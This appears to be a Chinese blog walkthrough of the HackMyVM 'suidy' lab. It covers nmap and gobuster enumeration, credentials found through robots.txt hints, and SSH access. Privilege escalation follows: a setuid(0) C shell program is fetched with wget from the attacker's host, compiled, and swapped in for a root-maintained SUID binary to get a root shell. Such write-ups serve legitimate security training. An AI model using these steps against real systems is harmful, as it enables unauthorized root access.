guayu-kakeru
0%

HMV-suidy

发表于 分类于

HMV-suidy靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.169 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-09 11:22 CST
Nmap scan report for 192.168.179.169 (192.168.179.169)
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
|   256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_  256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: AA:6D:30:09:71:E8 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.39 ms 192.168.179.169 (192.168.179.169)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.93 seconds

web探测

1
2
3
4
5
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.169                                                         
hi

<!-- hi again -->

目录扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.169 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.179.169
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 22]
/robots.txt           (Status: 200) [Size: 362]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.169/robots.txt
/hi
/....\..\.-\--.\.-\..\-.
/shehatesme

扫到一个robots.txt 访问发现是一个摩斯密码和一个shehatesme,解密 解密时候的结果是hi again
那目标就是第二行的内容了
在web访问这个目录,出现一段话

1
She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist!

告诉了应该在这个目录扫描,字典都和我们说了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.169/shehatesme -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.179.169/shehatesme
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 229]
/.                    (Status: 301) [Size: 185] [--> http://192.168.179.169/shehatesme/./]
/search.txt           (Status: 200) [Size: 16]
Progress: 11424 / 11425 (99.99%)
===============================================================
Finished
===============================================================
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.169/shehatesme/search.txt
jaime11/JKiufg6

给了一个用户名和密码,尝试登录,但是登录不上去,用一开始/shehatesme目录中的账号密码登录成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kakeru)-[~/tmp]
└─# ssh jaime11@192.168.179.169                                                                      
The authenticity of host '192.168.179.169 (192.168.179.169)' can't be established.
ED25519 key fingerprint is SHA256:e/Y+QbyX33+qoiZpch9G5Mgf32Y1Cj2eBFPlMp3Qx10.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.179.169' (ED25519) to the list of known hosts.
jaime11@192.168.179.169's password: 
Permission denied, please try again.
jaime11@192.168.179.169's password: 

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# ssh theuser@192.168.179.169
theuser@192.168.179.169's password: 
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 27 00:41:28 2020
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
theuser@suidy:~$

提权

发现一个家目录下面的文件有suid

1
2
3
4
5
6
7
8
9
10
11
12
13
theuser@suidy:~$ find / -user root -perm -4000 -print 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
1
2
3
4
5
6
7
8
9
10
suidy@suidy:/home$ cd suidy/
suidy@suidy:/home/suidy$ ls
note.txt  suidyyyyy
suidy@suidy:/home/suidy$ cat note.txt 
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID. 
If you are "theuser" I hate you!

-suidy
1
2
3
4
5
6
7
8
9
10
suidy@suidy:/home$ cd suidy/
suidy@suidy:/home/suidy$ ls
note.txt  suidyyyyy
suidy@suidy:/home/suidy$ cat note.txt 
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID. 
If you are "theuser" I hate you!

-suidy
1
2
suidy@suidy:/home/suidy$ file suidyyyyy 
suidyyyyy: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a68ca005dccaf529f434e0408b05dc8614758fb7, not stripped

这个文件是一个可执行文件,并且有权限执行,而且发现执行之后我的用户就变成suidy了
下载到本地看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
┌──(root㉿kakeru)-[~/tmp]
└─# scp theuser@192.168.179.169:/home/suidy/suidyyyyy .
theuser@192.168.179.169's password: 
suidyyyyy                                                                        100%   16KB   2.3MB/s   00:00    
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# strings suidyyyyy                                  
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/bin/bash
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.**comment**

这里面有/bin/bash,猜测执行之后就是给一个终端,下载本地,用ida看看具体逻辑

1
2
3
4
5
6
7
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0x3E9u);
  setgid(0x3E9u);
  system("/bin/bash");
  return 0;
}

这里设置了一个suid然后执行/bin/bash,如果能改这个setsuid就可以了,改成0就是root的shell了
所以尝试创建一个文件。用相同的逻辑,替换掉这个文件,执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
suidy@suidy:/home/suidy$ wget 192.168.179.83/tmp.c
--2025-02-09 05:03:33--  http://192.168.179.83/tmp.c
Connecting to 192.168.179.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [text/x-csrc]
Saving to: 'tmp.c'

tmp.c                        100%[=============================================>]     122  --.-KB/s    in 0s      

2025-02-09 05:03:33 (1.31 MB/s) - 'tmp.c' saved [122/122]

suidy@suidy:/home/suidy$ chmod +x tmp.c
suidy@suidy:/home/suidy$ cat tmp.c
#include <stdio.h>
#include <unistd.h>
int main(){
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
suidy@suidy:/home/suidy$ gcc tmp.c -o a

但是直接mv提示进程在占用,因为之前运行过了suidyyyyy这个文件,然后在了suidy这个用户的bash中
所以设置一下两个文件的权限
退出到theuser然后再替换

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
suidy@suidy:/home/suidy$ chmod 777 a
suidy@suidy:/home/suidy$ cp a /tmp
suidy@suidy:/home/suidy$ mv a suidyyyyy
theuser@suidy:/tmp$ cp suidyyyyy /home/suidy/suidyyyyy
theuser@suidy:/tmp$ cd /home/suidy
theuser@suidy:/home/suidy$ ./suidyyyyy 
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
theuser@suidy:/home/suidy$ ls
a  a.c  note.txt  pspy64  suidyyyyy  tmp.c
theuser@suidy:/home/suidy$ ls -al
total 3108
drwxr-xr-x 3 suidy suidy      4096 Feb  9 05:04 .
drwxr-xr-x 4 root  root       4096 Sep 26  2020 ..
-rw------- 1 suidy suidy        12 Sep 27  2020 .bash_history
-rw-r--r-- 1 suidy suidy       220 Sep 26  2020 .bash_logout
-rw-r--r-- 1 suidy suidy      3526 Sep 26  2020 .bashrc
drwxr-xr-x 3 suidy suidy      4096 Sep 26  2020 .local
-rw-r--r-- 1 suidy suidy       807 Sep 26  2020 .profile
-rwxrwxrwx 1 suidy theuser   16712 Feb  9 05:04 a
-rw-r--r-- 1 suidy theuser       0 Feb  9 05:00 a.c
-r--r----- 1 suidy suidy       197 Sep 26  2020 note.txt
-rwxr-xr-x 1 suidy theuser 3104768 Feb  5 11:11 pspy64
-rwsrwsr-x 1 root  theuser   16712 Feb  9 05:14 suidyyyyy
-rwxr-xr-x 1 suidy theuser     122 Feb  9 05:03 tmp.c
theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# cd /root   
root@suidy:/root# ls
root.txt  timer.sh
root@suidy:/root#

结束

总结:有点意思的只有提权这边,对有suid的程序进行分析,然后修改suid的值替换原文件